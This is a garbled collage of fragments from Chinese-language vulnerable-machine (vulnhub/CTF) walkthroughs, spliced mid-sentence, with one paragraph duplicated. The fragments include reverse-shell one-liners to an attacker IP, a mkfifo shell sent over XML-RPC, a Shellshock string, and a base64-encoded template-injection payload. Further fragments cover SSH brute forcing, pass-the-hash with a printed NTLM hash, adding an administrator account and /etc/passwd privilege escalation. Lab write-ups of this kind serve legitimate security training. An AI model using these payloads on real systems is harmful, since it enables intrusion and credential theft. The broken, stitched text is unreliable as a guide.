TBBT2 靶机地址: https://download.vulnhub.com/tbbt/TBBT2.ova 主机存活扫描 ┌──(kali㉿kali)-[~]└─$ sudo arp-scan -l tmp = tmp - (Math.floor((tmp/Math.pow(256,2))) \* Math.pow(256,2)); if(Math.floor((tmp/Math.pow : `-a2': invalid number specifier-rbash: /dev/null: restricted: cannot redirect outputsheldon@tbbt2:~ cd /tmpsheldon@tbbt2:/tmp$ pwd/tmpsheldon@tbbt2:/tmp$ echo "/bin/bash" > slsheldon@tbbt2:/tmp$ chmod +777 slsheldon@tbbt2:/tmp$ export PATH=/tmp:$PATHsheldon@tbbt2:/tmp$ ..
3493 XMLRPC 逆向工程 动态调试 缓冲区溢出 漏洞利用代码编写 靶机下载地址:https://download.vulnhub.com/boredhackerblog/hard_socnet2. ova 攻击方法有2种,CVE-2021-3493 另类提权方式 攻击主机:kali Linux 2021 192.168.0.103 目标主机: Ubuntu 18 攻击开始 nmap -p- -sV -2021-9493(蚁剑的shell无法提权shell需要转nc shell) 20210905143059514008.png 上传exp文件运行,getshell,id查看自己的身份为root 打靶结束 能如此轻松的解决这个靶机根本原因也是因为——该靶机为2020年的靶机,而刚才的打靶过程中,可是用到了2021年的CVE,也就是说我在用前朝的剑斩本朝的君! 8000/") as proxy: res = str(proxy.secure_cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>
2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第10台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! wordpress插件漏洞利用 php反弹 流量嗅探tcpdump Linux常用命令 0x02 信息搜集 端口发现 端口服务探测 值得注意的是: 发现开了80端口却无法访问,是重定向到five86-2域名 抓包命令为 timeout 120 tcpdump -w 1.pcap -i veth37191d0 其中timeout 120是指2分钟,-w是将结果输出到文件,-i是指定监听端口 同理,把第一个br-eca385 esomepasswford 发现ftp的密码为esomepasswford 尝试用户去密码喷洒一下ftp服务 hydra -L sshuser.txt -p 'esomepasswford' five86-2
2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第2台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! 爆破ssh hydra -L users.txt -P passwds.txt dc-2 -s 7744 ssh -vV [7744][ssh] host: dc-2 login: tom password : parturient 登录ssh ssh tom@dc-2 -p 7744 tom@DC-2:~$ whoami -rbash: whoami: command not found tom@DC- 2:~$ pwd /home/tom tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found 密码可以执行git sudo -l jerry@DC-2:/home$ sudo -l Matching Defaults entries for jerry on DC-2: env_reset
0 /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2: 2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ⼀般打靶场这种后续都可以利⽤到。 [01]: Red Hat VirtIO Ethernet Adapter 连接名: 以太网 2 启用 172.22.9.7 -username administrator -domain xiaorang.lab 成功获取到hash后⽤wmiexec就ok了 python wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80
\Windows\System32\cmd.exe" /c net localgroup administrators Adrian /add 然后启动服务 sc start gupdate flag2
192.168.38.140 '() { :;};/bin/bash':可以看到这里已经链接到:查找高权限文件:可以看到有root可疑文件,运行不同的root文件,发现需要传入参数,输入500个A,测试到door2中 r00t会崩溃,是我们需要的,抠出来:接下来用ida打开分析一下:可以看到这是一个缓冲区溢出漏洞,生成随机字符串:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:e8:ad:80:35:81:c4:29:7e:cf:e4:70:f2: 69:d9:96 (RSA) | 256 46:20:20:03:9c:97:35:f6:2d:5d:62:4a:be:6c:95:8e (ECDSA) |_ 256 ae:90:88:f6:63 :8d:dc:60:fa:ff:fc:70:12:e4:f4:1f (ED25519) MAC Address: 00:0C:29:1B:B5:A2 (VMware) Warning: OSScan results anonymous,密码anonymous采用匿名登录 默认是ASCII模式,输入binary切换为二进制模式 get cred.txt welcome将ftp文件获取到本地 打开cred.txt获取文件内容Y2hhbXA6cGFzc3dvcmQ
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i fMlJCSAbARA5gNVQFkjGzAwAADL7QTzijujCwAAAABJRU5ErkJgggotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVzZXJfaW5wdXQiCgo8cD5hc2RmPC9wPgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3Ni0t PGZvbnQgY29sb3I9IlsgWyBnZXRhdHRyKHBvdywgV29yZCgnX19nbG9iYWxzX18nKSlbJ29zJ10uc3lzdGVtKCd7Y21kfScpIGZvciBXb3JkIGluIFsgb3JnVHlwZUZ1biggJ1dvcmQnLCAoc3RyLCksIHsgJ211dGF0ZWQnOiAxLCAnc3RhcnRzd2l0aCc6IGxhbWJkYSBzZWxmLCB4OiBGYWxzZSwgJ19fZXFfXyc6IGxhbWJkYSBzZWxmLCB4OiBzZWxmLm11dGF0ZSgpIGFuZCBzZWxmLm11dGF0ZWQgPCAwIGFuZCBzdHIoc2VsZikgPT0geCwgJ211dGF0ZSc6IGxhbWJkYSBzZWxmOiB7c2V0YXR0cihzZWxmLCAnbXV0YXRlZCcsIHNlbGYubXV0YXRlZCAtIDEpfSwgJ19faGFzaF9fJzogbGFtYmRhIHNlbGY6IGhhc2goc3RyKHNlbGYpKSwgfSwgKSBdIF0gZm9yIG9yZ1R5cGVGdW4gaW4gW3R5cGUodHlwZSgxKSldXSBhbmQgJ3JlZCciPgoxPC9mb250PjwvcD4
subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.10",777));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); 可以看到 应该立马就猜到有可能这是在docker里了 我们来继续验证下是不是在docker里 1.ls -alh /.dockerenv 一般来说如果在非docker环境下是没有这个.dockerenv文件的 2. python2 -m SimpleHTTPServer 8888 接下来就利用icmp去循环查找一下其他机器 for i in $(seq 1 255); do ping -c 1 172.17.0.
利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B..123admin,尝试内网横向 扫描存活指向第二台135主机,利用CS开了socket代理进内网 No2 downloadUrl=参数&directoryName=suce 不会显示下载成功,但是文件的确会进行自己解压 尝试访问webshell页面白色成功解析,利用蚁剑成功连接 2.2 getshell-2 sp_OAMethod @ObjectToken,'Write',NULL, @DATAEXEC sp_OAMethod @ObjectToken,'SaveToFile',NULL, @filepath,2EXEC
本文作者NaMi 01vulntarget-b拓扑 IP1:192.168.10.104 IP2:10.0.20.30 搭建好环境之后,开始我们的实验。 vulntarget-2下载地址 百度云: 链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA 提取码:s4ka 阿里云暂不支持zip文件分享。。。。 m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnBocA== link位置是base64编码的地址 然后正常访问到下载的木马文件
192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 然后使用john进行破解 20210925234919702076.png 得出密码为 unicorn 进行登录 登录成功,然后使用find命令查找可以进行提权的文件 find / -perm /4000 2 > /dev/null find / -perm /2000 2 > /dev/null find / /writable 2 > /dev/null 存在/etc/passwd可以进行文件写入 使用 ,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束 XRSec has the
: 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录
拓扑 kali:192.168.0.108 centos: 192.168.0.104 2. 扫了一下发现了一个30.2的ip,开放了22和8081 打开8081端口之后是一个web服务Nexus Repository Manager: 老样子,百度搜索历史漏洞,看漏洞都是后台的,这里根据flag2的提示 1、第一个提权,需要翻目录,把目录当成了文件 2、第二个提权也耗费了好多时间,最终找了个集成好的的工具进行利用。
利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B..123admin,尝试内网横向 扫描存活指向第二台135主机,利用CS开了socket代理进内网 No2 downloadUrl=参数&directoryName=suce 不会显示下载成功,但是文件的确会进行自己解压 尝试访问webshell页面白色成功解析,利用蚁剑成功连接 2.2 getshell-2 sp_OAMethod @ObjectToken,'Write',NULL, @DATAEXEC sp_OAMethod @ObjectToken,'SaveToFile',NULL, @filepath,2EXEC
2. 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f 27 ba 60 3b 91 d5 fa 53 fc 5b 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
使用BurpSuite对网页登录框,进行密码账号爆破 2. 通过命令注入漏洞,进行命令注入 3. 使用hydra对ssh进行爆破 4. 通过现有的脚本进行提权操作 -END-
#获取端口 nmap -A 192.168.1.148 可以看到靶机开放了80端口和22端口,访问一下页面 可惜的是访问不了,因为做了域名绑定,所以需要我们在本地做个域名映射,这个和之前DC-2是一样的问题
python -c 'import pty;pty.spawn ( "/bin/bash")' 06 提权 #通过find提权,查看用root权限运行的命令 find / -perm -4000 2> screen 4.5.0 可以看到有两个漏洞利用,这里我们使用linux/local/41154.sh脚本 进入目录看下脚本 这个脚本主要由三部分组成,原本是直接执行脚本,可惜这个脚本有问题,所以需要创建2个文件